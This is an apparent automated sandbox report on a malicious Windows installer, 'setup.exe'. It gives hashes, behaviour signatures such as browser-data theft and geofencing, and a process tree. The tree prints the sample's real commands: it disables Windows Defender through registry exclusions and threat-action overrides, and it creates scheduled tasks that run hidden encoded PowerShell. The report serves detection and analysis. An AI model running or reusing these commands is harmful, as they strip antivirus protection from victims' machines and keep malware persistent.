Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 08:05

General

  • Target

    PL/setup.exe

  • Size

    7.3MB

  • MD5

    8b036a5a7406f7227ac65f44e1827fca

  • SHA1

    3a8499ecca8be3f69cc7163b03f3f499bbe8276f

  • SHA256

    85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1

  • SHA512

    91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a

  • SSDEEP

    196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4772
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2480
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:896
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:396
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              6⤵
                PID:2296
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:184
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "gcUptHLuv" /SC once /ST 01:00:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:932
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /run /I /tn "gcUptHLuv"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2816
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /DELETE /F /TN "gcUptHLuv"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2920
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe\" sw /site_id 525403 /S" /V1 /F
            4⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\system32\gpupdate.exe
        "C:\Windows\system32\gpupdate.exe" /force
        2⤵
          PID:4720
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
        1⤵
          PID:2396
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
          1⤵
            PID:4468
          • C:\Windows\system32\gpscript.exe
            gpscript.exe /RefreshSystemParam
            1⤵
              PID:2740
            • C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe
              C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe sw /site_id 525403 /S
              1⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1148
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4560
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3580
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                  3⤵
                    PID:1852
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1944
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3820
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1136
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3860
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:932
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2716
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2572
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4832
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                      3⤵
                        PID:2596
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:3236
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:3488
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:872
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3012
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1992
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3016
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:64
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:1812
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1500
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:380
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:1164
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:4440
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2260
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\biwNYXhGTKCQxjLv\" /t REG_DWORD /d 0 /reg:64;"
                                  2⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4304
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:4584
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3532
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4968
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3904
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                        PID:5072
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3416
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2876
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3952
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                          PID:1120
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4972
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                            PID:4944
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5056
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eiYaNjTCbhfbMeVB /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:1564
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3748
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4292
                                            • C:\Windows\SysWOW64\reg.exe
